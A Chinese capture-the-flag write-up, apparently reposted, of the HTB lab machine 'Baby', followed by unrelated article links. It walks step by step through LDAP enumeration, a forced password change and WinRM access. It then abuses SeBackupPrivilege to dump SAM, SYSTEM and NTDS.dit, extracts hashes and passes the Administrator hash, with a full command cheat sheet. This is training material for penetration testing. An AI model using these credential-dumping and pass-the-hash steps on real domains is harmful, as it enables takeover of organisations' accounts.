【渗透测试】HTB靶场之Baby 全过程wp

news/2026/1/23 23:38:25/文章来源:https://www.cnblogs.com/DSchenzi/p/19524267

HTB Baby

靶机IP 10.129.234.71

先扫描一下端口

image-20260123154626334

image-20260123154632081

发现开了445端口(SMB协议)

SMB-TCP 445

┌──(root㉿kali)-[~/桌面/HTB/baby]
└─# netexec smb 10.129.234.71 --generate-hosts-file hosts
SMB         10.129.234.71   445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False)┌──(root㉿kali)-[~/桌面/HTB/baby]
└─# cat hosts
10.129.234.71     BABYDC.baby.vl baby.vl BABYDC┌──(root㉿kali)-[~/桌面/HTB/baby]
└─# cat hosts /etc/hosts | sudo sponge /etc/hosts

image-20260123160402706

尝试对目标smb服务进行guest身份的共享枚举

┌──(root㉿kali)-[~/桌面/HTB/baby]
└─# netexec smb 10.129.234.71 -u guest -p '' --shares           
SMB         10.129.234.71   445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False)
SMB         10.129.234.71   445    BABYDC           [-] baby.vl\guest: STATUS_ACCOUNT_DISABLED发现账号被禁用

image-20260123165858680

该方法不行

LDAP-TCP 389

使用netexec工具从目标机器上提取(dump)LDAP中的用户数据(比如域用户名、组、权限等)

netexec ldap BABYDC.baby.vl -u '' -p '' --query "(objectClass=*)" ""

image-20260123172431090

sAMAccountName查询可用于登录的账户名

netexec ldap BABYDC.baby.vl -u '' -p '' --query "(sAMAccountName=*)" ""

image-20260123174514007

可以看到这里有一个初始密码BabyStart123!

但依旧匹配不了

image-20260123175345605

经过发现在上一个的objectClass=*中最后有一个Caroline Robinson,没有关联的数据

image-20260123180128913

┌──(root㉿kali)-[~/桌面/HTB/baby]
└─# netexec smb BABYDC.baby.vl -u Caroline.Robinson -p 'BabyStart123!'
SMB         10.129.234.71   445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False)
SMB         10.129.234.71   445    BABYDC           [-] baby.vl\Caroline.Robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGE

虽然失败了,但是说的是STATUS_PASSWORD_MUST_CHANGE

password change

可以使用netexec change-password模块

这里建议去github下载最新版本的nxc

https://github.com/Pennyw0rth/NetExec

┌──(root㉿kali)-[~/桌面/shentougongju]
└─# ./nxc smb BABYDC.baby.vl -u Caroline.Robinson -p 'BabyStart123!' -M change-password -o NEWPASS=chenzi
[*] Initializing SMB protocol database
SMB         10.129.234.71   445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.234.71   445    BABYDC           [-] baby.vl\Caroline.Robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGE
CHANGE-P... 10.129.234.71   445    BABYDC           [-] SMB-SAMR password change failed: SAMR SessionError: code: 0xc000006c - STATUS_PASSWORD_RESTRICTION - When trying to update a password, this status indicates that some password update rule has been violated. For example, the password may not meet length criteria.

需要一个更复杂的密码

┌──(root㉿kali)-[~/桌面/shentougongju]
└─# ./nxc smb BABYDC.baby.vl -u Caroline.Robinson -p 'BabyStart123!' -M change-password -o NEWPASS=chenzi123!
SMB         10.129.234.71   445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.234.71   445    BABYDC           [-] baby.vl\Caroline.Robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGE
CHANGE-P... 10.129.234.71   445    BABYDC           [+] Successfully changed password for Caroline.Robinson

修改成功,我们看看密码策略

./nxc smb BABYDC.baby.vl -u Caroline.Robinson -p 'chenzi123!' --pass-pol

image-20260123214423536

Get Shell

枚举一下SMB共享资源

./nxc smb BABYDC.baby.vl -u Caroline.Robinson -p 'chenzi123!' --shares
┌──(root㉿kali)-[~/桌面/shentougongju]
└─# ./nxc smb BABYDC.baby.vl -u Caroline.Robinson -p 'chenzi123!' --shares
SMB         10.129.234.71   445    BABYDC           [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.234.71   445    BABYDC           [+] baby.vl\Caroline.Robinson:chenzi123! 
SMB         10.129.234.71   445    BABYDC           [*] Enumerated shares
SMB         10.129.234.71   445    BABYDC           Share           Permissions     Remark
SMB         10.129.234.71   445    BABYDC           -----           -----------     ------
SMB         10.129.234.71   445    BABYDC           ADMIN$          READ            Remote Admin
SMB         10.129.234.71   445    BABYDC           C$              READ,WRITE      Default share
SMB         10.129.234.71   445    BABYDC           IPC$            READ            Remote IPC
SMB         10.129.234.71   445    BABYDC           NETLOGON        READ            Logon server share 
SMB         10.129.234.71   445    BABYDC           SYSVOL          READ            Logon server share 

确认 了Caroline.Robinson 是有实际权限的域账户,不是空壳

既然获得了账户凭证,我们可以通过WinRM协议远程登录目标机器

evil-winrm -i baby.vl -u caroline.robinson -p chenzi123!

image-20260123215834962

得到了shell,user.txt在destop下

Privilege Escalation

whoami /priv 查看当前用户的权限

*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop> whoami /privPRIVILEGES INFORMATION
----------------------Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

获取SAM和system(渗透黄金特权)

我们看到他拥有SeBackupPrivilege和SeRestorePrivilege权限,这些权限通常授予Backup Operators组中的用户。如果我们使用 whoami /groups进行检查,会发现该用户确实属于这个组

image-20260123221656949

SeBackupPrivilege权限将允许我们创建注册表节文件备份,一旦破解这些文件,将能得到重要信息,如用户的NTLM哈希

更具体地说,我们需要SAM和SYSTEM组件,SAM存储了本地账户地元数据以及机器上本地用户经过哈希处理后的凭据(NTLM哈希)。而SYSTEM则包含用于推导出启动密钥所需地信息,该密钥用于解密SAM组件。

补充:
这里也就是渗透黄金特权的一种1. SeDebugPrivilege(调试特权)
作用:允许调试任意进程(包括系统进程 lsass.exe)
渗透价值:
直接用 mimikatz 抓取 lsass 内存中的明文密码 / NTLM 哈希
拿到本地管理员、域管理员密码
一句话:有它 = 基本能直接拿密码2. SeBackupPrivilege + SeRestorePrivilege(备份 / 还原特权)
作用:
SeBackupPrivilege:绕过文件权限,备份任何文件(包括 SAM、NTDS.dit)
SeRestorePrivilege:绕过文件权限,还原 / 覆盖任何文件(替换系统服务、写注册表)
渗透价值:
直接备份 SAM + SYSTEM → 拿本地管理员哈希
直接备份 NTDS.dit + SYSTEM → 拿整个域的所有用户哈希
替换系统服务 → 提权到 SYSTEM
一句话:有它 = 能拿系统 / 域的 “密码总库”3. SeImpersonatePrivilege(模拟特权)
作用:允许模拟其他用户身份执行操作
渗透价值:
配合 JuicyPotato / PrintSpoofer 等工具 → 直接提权到 SYSTEM
模拟高权限用户执行命令、访问资源
一句话:有它 = 土豆 / 南瓜提权套餐直接上4. SeTakeOwnershipPrivilege(获取所有权特权)
作用:夺取任意文件 / 注册表项的所有权
渗透价值:
夺取 C:\Windows\System32\config 等关键目录所有权 → 读写 SAM、SYSTEM
夺取注册表项 → 修改系统配置、后门
一句话:有它 = 能 “抢” 系统核心资源的控制权
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop> reg save hklm\sam .\sam
The operation completed successfully.*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop> reg save hklm\system .\system
The operation completed successfully.

得到两个文件后,使用download进行下载

*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop> download samInfo: Downloading C:\Users\Caroline.Robinson\Desktop\sam to sam Info: Download successful! 
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Desktop> download systemInfo: Downloading C:\Users\Caroline.Robinson\Desktop\system to system Info: Download successful!

把你下载到 Kali 的 samsystem 文件,用 impacket-secretsdump

impacket-secretsdump -sam sam -system system LOCAL

image-20260123224046407

格式:用户名:RID:LM哈希:NTLM哈希:::

管理员的NTLM哈希:8d992faed38128ae85e95fa35868bb43

将得到的哈希进行传递

image-20260123224406565

image-20260123225139745

但登录不了

获取NTDS.dit(diskshadow创建C盘卷影副本)

我们下一步将尝试得到域控哈希值。为此,我们需要NTDS.dit(域控制器存储所有域用户密码哈希的核心数据库)。然而,该文件被锁定,我们无法直接复制。因此,我们使用diskshadow工具创建当前硬盘的卷影副本。这样我们就可以导出,并访问该文件。

set verbose on
set context persistent nowriters
set metadata C:\Windows\Temp\chenzi.cab
add volume c: alias chenzi
create
expose %chenzi% e:

创建 C 盘的卷影副本,并将其映射为 E 盘,方便访问快照里的核心文件。

并转换为windows格式

image-20260123230058735

上传文件

upload backup backup

image-20260123230325647

diskshadow /s backup

image-20260123230553944

可以看到放到了E盘

image-20260123230644618

由于该驱动器目前未被使用,我们可以使用robocopy将NTDS.dit文件复制到当前目录中

robocopy /b E:\Windows\ntds . ntds.dit解释一下这个
/b 备份模式
E:\Windows\ntds 目录,包含了 C 盘的快照,能访问到被锁定的文件。
. 表示目标目录即当前目录
ntds.dit即要复制的文件

image-20260123231154046

这样我们就得到了ntds.dit

image-20260123231215403

依旧也是下载下来

image-20260123232059290

然后回到kali

impacket-secretsdump -ntds ntds.dit -system system LOCAL

image-20260123232123965

得到Administrator的哈希值:ee4457ae59f1e3fbd764e33d9cef123d

然后再使用evil-winrm获得shell

evil-winrm -i baby.vl -u Administrator -H ee4457ae59f1e3fbd764e33d9cef123d

image-20260123232201274

得到Administrator的shell

渗透总结

本靶机核心是通过域用户凭证获取与黄金特权利用,实现从普通域用户到域管理员的权限提升。首先通过端口扫描与 LDAP 信息搜集,获取域用户Caroline.Robinson及初始密码,解决密码必须修改的限制后,利用该账户的SeBackupPrivilegeSeRestorePrivilege黄金特权,备份系统核心文件(SAM、SYSTEM、NTDS.dit),解析出域管理员哈希,最终通过哈希传递登录域控制器,完成渗透。

核心知识点

信息搜集核心

  • 端口扫描重点:SMB(445)、LDAP(389/3268)、WinRM(5985)是域环境渗透关键端口,分别对应文件共享、用户信息查询、远程命令执行功能。
  • LDAP 枚举价值:可匿名查询域内用户、组信息,获取可登录账户名及潜在初始密码,为后续认证提供基础。

账户凭证与密码策略

  • STATUS_PASSWORD_MUST_CHANGE:账户初始密码需修改,且新密码需符合域密码策略(如长度≥7 位、包含大小写 / 数字 / 特殊符号)。
  • 密码策略查询:通过--pass-pol参数可获取域密码规则,指导新密码设置与后续爆破策略制定。

渗透黄金特权应用

  • SeBackupPrivilege + SeRestorePrivilege:允许绕过文件权限,备份 / 还原系统核心文件(SAM、NTDS.dit),是域环境中获取所有用户哈希的关键特权。
  • 卷影副本(VSS):用于绕过 NTDS.dit 等被系统锁定的文件,通过diskshadow创建快照后可自由复制。

哈希传递攻击(Pass-the-Hash)

  • 无需破解明文密码,直接使用解析出的 NTLM 哈希登录目标机器,适用于 WinRM、SMB 等协议。
  • 域管理员哈希需从 NTDS.dit(域密码总库)中解析,而非本地 SAM 文件(仅存储本地账户哈希)。

重要命令汇总

信息搜集与环境配置

# 全端口扫描(获取关键端口)
无影扫描工具 10.129.234.71 -p 1-65535
# 添加主机映射(方便域环境访问)
echo "10.129.234.71 BABYDC.baby.vl baby.vl BABYDC" | sudo tee -a /etc/hosts
# LDAP匿名枚举域用户
netexec ldap BABYDC.baby.vl -u '' -p '' --query "(sAMAccountName=*)" ""

账号密码操作

# 修改域用户密码(解决STATUS_PASSWORD_MUST_CHANGE)
./nxc smb BABYDC.baby.vl -u Caroline.Robinson -p 'BabyStart123!' -M change-password -o NEWPASS=chenzi123!
# 查询域密码策略
./nxc smb BABYDC.baby.vl -u Caroline.Robinson -p 'chenzi123!' --pass-pol
# 枚举SMB共享资源(验证账户权限)
./nxc smb BABYDC.baby.vl -u Caroline.Robinson -p 'chenzi123!' --shares

远程登陆与权限查询

# WinRM远程登录(获取普通用户shell)
evil-winrm -i baby.vl -u Caroline.Robinson -p 'chenzi123!'
# 查询当前用户特权(确认黄金特权)
whoami /priv
# 查询用户所属组(验证Backup Operators组身份)
whoami /groups

核心文件备份与下载

# 备份SAM和SYSTEM注册表文件(本地账户哈希)
reg save hklm\sam .\sam
reg save hklm\system .\system
# 下载文件到Kali
download sam
download system
# diskshadow批量创建卷影副本(备份NTDS.dit)
# 先在Kali创建backup脚本并转换格式
unix2dos backup
# 上传脚本到目标机器
upload backup backup
# 执行脚本创建卷影副本并映射为E盘
diskshadow /s backup
# 备份NTDS.dit(备份模式绕过锁定)
robocopy /b E:\Windows\ntds . ntds.dit
# 下载NTDS.dit到Kali
download ntds.dit

哈希解析与域管理员登录

# 解析本地账户哈希(SAM+SYSTEM)
impacket-secretsdump -sam sam -system system LOCAL
# 解析域用户哈希(NTDS.dit+SYSTEM)
impacket-secretsdump -ntds ntds.dit -system system LOCAL
# 哈希传递登录域管理员(WinRM)
evil-winrm -i baby.vl -u Administrator -H [域管理员NTLM哈希]

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/1206906.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

提示工程架构师指南:AI提示设计中用户行为预测的工具推荐

提示工程架构师指南:AI提示设计中用户行为预测的工具推荐 引言:为什么提示设计需要“预判用户”? 你有没有过这样的经历? 精心设计的AI提示,用户却根本不按引导输入——要么写得太笼统(比如“帮我写个文案…

提示工程架构师必备:物流规划中的上下文蒸馏技术

提示工程架构师必备:物流规划中的上下文蒸馏技术 一、引言:当大模型遇到“物流信息爆炸” 你有没有遇到过这样的场景? 用GPT帮快递公司做路径规划时,它明明接收了1000条订单数据、50个仓库库存、20辆车辆状态、30条约束规则&…

人群仿真软件:SimWalk_(3).SimWalk软件安装与配置

SimWalk软件安装与配置 软件安装 下载SimWalk 在开始安装SimWalk之前,首先需要从官方网站或指定的下载源下载最新版本的SimWalk软件。以下是一些常见的下载步骤:访问官方网站: 打开浏览器,访问SimWalk的官方网站(假设网…

Blazor Hybrid(Server+Wasm)禁用预渲染的话

Blazor Hybrid(Server+Wasm)禁用预渲染的话Blazor Hybrid 禁用预渲染的影响 负面影响 1. 首屏加载体验降级用户先看到空白页或加载动画 需等待 WebSocket/SignalR 建立连接后才渲染内容 初次访问延迟增加 200-800ms(取…

nodejs基于vue营商环境行动计划管理系统设计与开发_f9uxi

文章目录 系统概述核心功能模块技术实现要点部署与优化应用场景 --nodejs技术栈--结论源码文档获取/同行可拿货,招校园代理 :文章底部获取博主联系方式! 系统概述 Node.js与Vue.js结合的营商环境行动计划管理系统旨在通过现代化技术栈实现高效、响应式的…

人群仿真软件:SimWalk_(3).基础操作与界面导航

基础操作与界面导航 启动软件 在开始使用人群仿真软件进行开发之前,首先需要启动软件。SimWalk 的启动过程非常简单,通常只需双击桌面图标或从应用程序列表中选择即可。启动后,软件会加载默认的用户界面,包括主菜单、工具栏和工…

计算机专业下一站风口在哪?2026四大高景气航道+网络安全327万缺口全解析

计算机专业未来发展全景图(2025-2030)网络安全就业形势与人才缺口 327 万一、数据&趋势维度数据 & 趋势关键结论整体就业率2024 届计算机本科 68.7%,名校 vs 普校差距拉大到 30 pct选方向 > 卷学历初级岗位传统 Java/前端回…

如何将集体好奇心融入产品定价策略

如何将集体好奇心融入产品定价策略 关键词:集体好奇心、产品定价策略、消费心理、市场竞争、价格弹性、营销策略、用户参与 摘要:本文深入探讨了如何将集体好奇心融入产品定价策略这一重要课题。首先介绍了研究的背景、目的、预期读者和文档结构等内容。接着阐述了集体好奇心…

豆瓣评分上涨!观众喊话:开年好片,后劲太大!

《我的朋友安德烈》绝对是开年最催泪的电影,董子健的导演首秀真是让人惊喜!故事其实不复杂,但就是特别打动人,好多人看完在网上评价说“看哭了”“后劲上头”。它就像一把温柔的钥匙,打开了每个人心里关于童年、家庭、…

【康托展开】P5367 【模板】康托展开

康托展开学习是一个持续的过程,每一小步都是进步。 ———— 未知1. 定义 康托展开是一种将全排列映射到唯一自然数的双射算法(即一一对应,无重复、无遗漏)。 简单来说,它能给每一个 n 位全排列分配一个独一无二的…

华设设计集团安卓开发岗位深度解析与技术指南(完整版)

华设设计集团股份有限公司 android安卓开发 职位信息 岗位职责: 1.负责公司智能产品APP端的研发和维护工作,完成高质量编码; 2.深度参与产品需求讨论,功能定义等; 3.持续优化移动端APP性能、能够深入业务思考,负责核心业务开发。 任职要求: 1.本科及以上学历,计算机、…

适合技术学习的5个科学学习技巧

在编程、AI Agent、DevOps、网站开发等技术领域,高效学习需要借助科学的方法。根据认知心理学研究和学习科学资料(如《Make It Stick》以及 Coursera 上的 “Learning How to Learn” 课程),以下总结了5 个经过科学…

【2026最新】系统进程优化工具 | Process Lasso 中文绿色便携版,智能进程管理工具 使用与安装教学

说实话,电脑用久了,卡顿、假死、程序无响应这些毛病,大家或多或少都遇到过。尤其是开着好几个软件的时候,明明配置不差,系统却慢得像踩了刹车。你以为是电脑老了?其实,很可能是“进程调度”出了…

进程优化工具 Process Lasso v17.0.2.20 绿色便携版,Process Lasso调试进程级别的系统优化工具,CPU优化工具ProcessLasso

获取地址:Process Lasso Pro Process Lasso Pro 是一款专业的系统进程优化工具,通过其独特的 ​​ProBalance(进程平衡)算法​​动态调整进程优先级与CPU亲和性,有效缓解系统卡顿、蓝屏、进程无响应等问题。‘ 它实时…

Veitool 后台框架系统 - ThinkPHP 版 v2.3.5 已经发布

Veitool后台框架系统(ThinkPHP版)v2.3.5 已于近期发布。 主要更新内容 这次版本更新包含以下主要改动: 框架升级:底层已升级至 ThinkPHP v8.1.4。 安全增强: 集成了 JWT(JSON Web Token)认证…

【最新版】系统进程优化工具Process Lasso v17.0.2.20 便携版 轻松搞定进程管理难题 !拯救老电脑告别卡顿

Process Lasso是一款非常独特神奇的性能windows优化工具,其核心功能进程平衡器(ProBalance),通过对进程CPU及 I/O 负载监控,超标自动抑制,达到动态平衡系统负载,让你再也没有卡.卡…卡的感觉,适用于WinXP、…

【读书笔记】《主街百万富翁》

《主街百万富翁》书籍推荐与解读 《主街百万富翁》(Main Street Millionaire)是美国投资人Cody Sanchez的著作。这本书在美国近年来大受欢迎,它传递了一个看似“反潮流”的观点:在当下普通人追求财富的路径中,不必执着…

【计算机毕业设计案例】基于springboot框架实现医疗服务系统管理平(程序+文档+讲解+定制)

博主介绍:✌️码农一枚 ,专注于大学生项目实战开发、讲解和毕业🚢文撰写修改等。全栈领域优质创作者,博客之星、掘金/华为云/阿里云/InfoQ等平台优质作者、专注于Java、小程序技术领域和毕业项目实战 ✌️技术范围:&am…

MBA必看!9个降AI率工具高效推荐

MBA必看!9个降AI率工具高效推荐 AI降重工具:MBA论文的高效护航者 在当今学术研究日益数字化的背景下,MBA学生面对的不仅是复杂的商业案例分析和严谨的逻辑论证,还有AI生成内容(AIGC)带来的查重率压力。随着…

学长亲荐!专科生毕业论文必备TOP8 AI论文平台测评

学长亲荐!专科生毕业论文必备TOP8 AI论文平台测评 2026年专科生毕业论文写作工具测评:为何需要这份榜单? 随着AI技术在学术领域的广泛应用,越来越多的专科生开始借助智能平台完成毕业论文的撰写与修改。然而,面对市场上…